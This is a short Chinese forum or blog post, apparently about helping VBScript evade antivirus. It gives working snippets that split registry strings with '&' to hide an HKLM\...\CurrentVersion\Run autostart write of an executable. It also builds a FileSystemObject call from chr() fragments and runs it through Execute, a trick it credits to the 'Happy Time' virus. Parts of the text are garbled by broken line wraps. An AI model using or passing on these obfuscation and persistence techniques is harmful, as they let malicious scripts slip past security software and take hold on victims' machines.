确实挺实用&号两边必须空格格开
现在杀毒
对vbs相当敏感只要发现对注册表xx作或使用vbs运行命令(加用户) 就可能被杀下面谈2思路方法可以简单解决:1.使用连接符"&" 如:
Set CURObj = createObject("WScript.Shell")
mhk="HK"&"LM\SOFT"&"WARE\Micr"&"osoft\Win"&"dows\Curren"&"tVersion\Run\"
CURObj.RegWrite ""&mhk&"
ernat.exe","ernat.exe"2.使用Execute
(BY 动鲨 )
些杀毒软件Software如瑞星他门会监视网页中代码旦你创建了FSO或写注册表即使是正常脚本他也会报告危险但是当年新欢乐时光也用了FSO如何就没报警呢?原因是这个病毒使用Execute这个来躲过了防火墙呵呵病毒将这段声明代码转化为
串然后通过Execute(String)执行举个例子 str="
fso=createObject( " & chr(34) & "scrip" & chr(116)& "ing.File
Object"&chr(34)&"" msgbox str
Execute str
篇文章: ASP最新SQL防注入过滤涵数篇文章: 木马静态变动态 DLL木马
大揭秘
最新评论